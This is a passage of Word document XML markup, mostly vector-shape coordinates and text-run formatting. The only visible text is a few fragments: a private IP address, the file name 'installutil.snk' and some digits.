,2842,3048,2900,3048,2958,3048,3018,3048,3080,3048,3142,3048,3206,3048,3272,3048,3338,3048,3407,3048,3476,3048,3547,3048,3620,3048,3694,3048,3769,3048,3846,3048,3924,3048,4004,3048,4086,3048,4169,3048,4254,3048,4340,3048,4427,3048,4517,3048,4608,3048,4701,3048,4795,3048,4891,3048,4988,3048,5088,3048,5189,3048,5292,3048,5292,3048,5293,3048,5293,3048,5294,3048,5295,3048,5296,3048,5297,3048,5298,3048,5298,3048,5299,3048,5300,3048,5301,3048,5302,3049,5303,3049,5303,3049,5304,3049,5305,3049,5306,3049,5306,3049,5307,3049,5308,3050,5309,3050,5309,3050,5310,3050,5311,3050,5311,3050,5312,3051,5313,3051,5313,3051,5314,3051,5315,3051,5315,3052,5316,3052,5317,3052,5317,3052,5318,3053,5319,3053,5319,3053,5320,3053,5320,3054,5321,3054,5322,3054,5322,3055,5323,3055,5323,3055,5324,3056,5324,3056,5325,3056,5325,3057,5326,3057,5327,3057,5327,3058,5328,3058,5328,3058,5329,3059,5329,3059,5329,3060,5330,3060,5330,3061,5331,3061,5331,3061,5332,3062,5332,3062,5333,3063,5333,3063,5333,3064,5334,3064,5334,3065,5335,3065,5335,3066,5335,3066,5336,3067,5336,3067,5336,3068,5337,3068,5337,3069,5337,3069,5338,3070,5338,3071,5338,3071,5339,3072,5339,3072,5339,3073,5339,3074,5340,3074,5340,3075,5340,3075,5340,3076,5341,3077,5341,3077,5341,3078,5341,3079,5341,3079,5342,3080,5342,3081,5342,3082,5342,3082,5342,3083,5343,3084,5343,3084,5343,3085,5343,3086,5343,3087,5343,3087,5343,3088,5343,3089,5344,3090,5344,3090,5344,3091,5344,3092,5344,3093,5344,3094,5344,3095,5344,3095,5344,3096,5344,3097,5344,3098,5344,3099,5344,3100,5344,3101,5344,3101,5344,3101,5344,3101,5344,3101,5344,3101,5344,3101,5344,3101,5344,3101,5344,3101,5344,3101,5344,3101,5344,3101,5344,3101,5344,3102,5344,3102,5344,3102,5344,3103,5344,3103,5344,3104,5344,3104,5344,3105,5344,3105,5344,3106,5344,3107,5344,3108,5344,3109,5344,3110,5344,3111,5344,3112,5344,3113,5344,3115,5344,3116,5344,3117,5344,3119,5344,3121,5344,3123,5344,3125,5344,3127,5344,3129,5344,3131,5344,3134,5344,3136,5344,3139,5344,3142,5344,3145,5344,3148,5344,3151,5344,3154,5344,3158,5344,3161,5344,3165,5344,3169,5344,3173,5344,3177,5344,3182,5344,3186,5344,3191,5344,3196,5344,3201,5344,3207,5344,3212,5344,3218,5344,3224,5344,3230,5344,3236,5344,3242,5344,3249,5344,3256,5344,3263,5344,3270,5344,3278,5344,3285,5344,3293,5344,3301,5344,3310,5344,3318,5344,3327,5344,3336,5344,3346,5344,3355,5344,3365,5344,3375,5344,3385,5344,3396,5344,3407,5344,3418,5344,3429,5344,3441,5344,3453,5344,3465,5344,3477,5344,3490,5344,3503,5344,3516,5344,3530,5344,3543,5344,3558,5344,3572,5344,3587,5344,3602,5344,3617,5344,3633,5344,3649,5344,3665,5344,3682,5344,3699,5344,3716,5344,3733,5344,3751,5344,3769,5344,3788,5344,3807,5344,3826,5344,3846,5344,3866,5344,3886,5344,3907,5344,3928,5344,3949,5344,3971,5344,3971,5344,3972,5344,3973,5344,3974,5344,3974,5344,3975,5344,3976,5344,3977,5344,3978,5344,3979,5344,3979,5344,3980,5344,3981,5344,3982,5343,3983,5343,3983,5343,3984,5343,3985,5343,3986,5343,3986,5343,3987,5343,3988,5342,3989,5342,3989,5342,3990,5342,3991,5342,3991,5341,3992,5341,3993,5341,3993,5341,3994,5341,3995,5340,3995,5340,3996,5340,3997,5340,3997,5339,3998,5339,3999,5339,3999,5339,4000,5338,4000,5338,4001,5338,4002,5337,4002,5337,4003,5337,4003,5336,4004,5336,4004,5336,4005,5335,4005,5335,4006,5335,4006,5334,4007,5334,4007,5333,4008,5333,4008,5333,4009,5332,4009,5332,4010,5331,4010,5331,4011,5330,4011,5330,4011,5329,4012,5329,4012,5329,4013,5328,4013,5328,4013,5327,4014,5327,4014,5326,4015,5325,4015,5325,4015,5324,4016,5324,4016,5323,4016,5323,4017,5322,4017,5322,4017,5321,4018,5320,4018,5320,4018,5319,4018,5319,4019,5318,4019,5317,4019,5317,4019,5316,4020,5315,4020,5315,4020,5314,4020,5313,4021,5313,4021,5312,4021,5311,4021,5311,4021,5310,4022,5309,4022,5309,4022,5308,4022,5307,4022,5306,4022,5306,4022,5305,4023,5304,4023,5303,4023,5303,4023,5302,4023,5301,4023,5300,4023,5299,4023,5298,4023,5298,4023,5297,4023,5296,4023,5295,4023,5294,4023,5293,4024,5293,4024,5292,4024,5292,4024,5292,4024,5292,4024,5292,4024,5292,4024,5291,4024,5291,4024,5291,4024,5290,4024,5290,4024,5289,4024,5288,4024,5287,4024,5286,4024,5285,4024,5283,4024,5282,4024,5280,4024,5277,4024,5275,4024,5272,4024,5269,4024,5266,4024,5262,4024,5258,4024,5254,4024,5249,4024,5244,4024,5238,4024,5232,4024,5226,4024,5219,4024,5212,4024,5204,4024,5196,4024,5187,4024,5178,4024,5168,4024,5158,4024,5147,4024,5135,4024,5123,4024,5111,4024,5098,4024,5084,4024,5069,4024,5054,4024,5038,4024,5022,4024,5005,4024,4987,4024,4968,4024,4949,4024,4928,4024,4907,4024,4886,4024,4863,4024,4840,4024,4816,4024,4791,4024,4765,4024,4738,4024,4710,4024,4682,4024,4652,4024,4622,4024,4590,4024,4558,4024,4524,4024,4490,4024,4455,4024,4418,4024,4381,4024,4342,4024,4303,4024,4262,4024,4220,4024,4178,4024,4134,4024,4089,4024,4042,4024,3995,4024,3946,4024,3896,4024,3845,4024,3793,4024,3740,4024,3685,4024,3629,4024,3571,4024,3513,4024,3453,4024,3392,4024,3329,4024,3265,4024,3200,4024,3133,4024,3065,4024,2995,4024,2924,4024,2851,4024,2778,4024,2702,4024,2625,4024,2547,4024,2467,4024,2385,4024,2302,4024,2218,4024,2132,4024,2044,4024,1954,4024,1863,4024,1771,4024,1676,4024,1580,4024,1483,4024,1383,4024,1282,4024,1180,4024,1180,4024,1179,4024,1178,4024,1177,4023,1176,4023,1175,4023,1174,4023,1174,4023,1173,4023,1172,4023,1171,4023,1170,4023,1170,4023,1169,4023,1168,4023,1167,4023,1166,4023,1166,4022,1165,4022,1164,4022,1163,4022,1163,4022,1162,4022,1161,4022,1161,4021,1160,4021,1159,4021,1158,4021,1158,4021,1157,4020,1156,4020,1156,4020,1155,4020,1154,4019,1154,4019,1153,4019,1153,4019,1152,4018,1151,4018,1151,4018,1150,4018,1150,4017,1149,4017,1148,4017,1148,4016,1147,4016,1147,4016,1146,4015,1146,4015,1145,4015,1145,4014,1144,4014,1144,4013,1143,4013,1143,4013,1142,4012,1142,4012,1141,4011,1141,4011,1140,4011,1140,4010,1140,4010,1139,4009,1139,4009,1138,4008,1138,4008,1137,4007,1137,4007,1137,4006,1136,4006,1136,4005,1136,4005,1135,4004,1135,4004,1135,4003,1134,4003,1134,4002,1134,4002,1133,4001,1133,4000,1133,4000,1132,3999,1132,3999,1132,3998,1132,3997,1131,3997,1131,3996,1131,3995,1131,3995,1130,3994,1130,3993,1130,3993,1130,3992,1130,3991,1129,3991,1129,3990,1129,3989,1129,3989,1129,3988,1129,3987,1128,3986,1128,3986,1128,3985,1128,3984,1128,3983,1128,3983,1128,3982,1128,3981,1128,3980,1127,3979,1127,3979,1127,3978,1127,3977,1127,3976,1127,3975,1127,3974,1127,3974,1127,3973,1127,3972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,1127,3971e x" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#dedfe3">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:68.400pt;margin-top:162.600pt;width:24.0pt;height:26.4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IBtCWU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IBtCWU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ErlgHH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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"192.168.1.4"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cmMtjerv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IBtCWU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1" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="313" w:lineRule="auto"/>
        <w:ind w:left="2125" w:right="8663" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>installuti</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.snk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color w:val="787878"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:color w:val="787878"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>96B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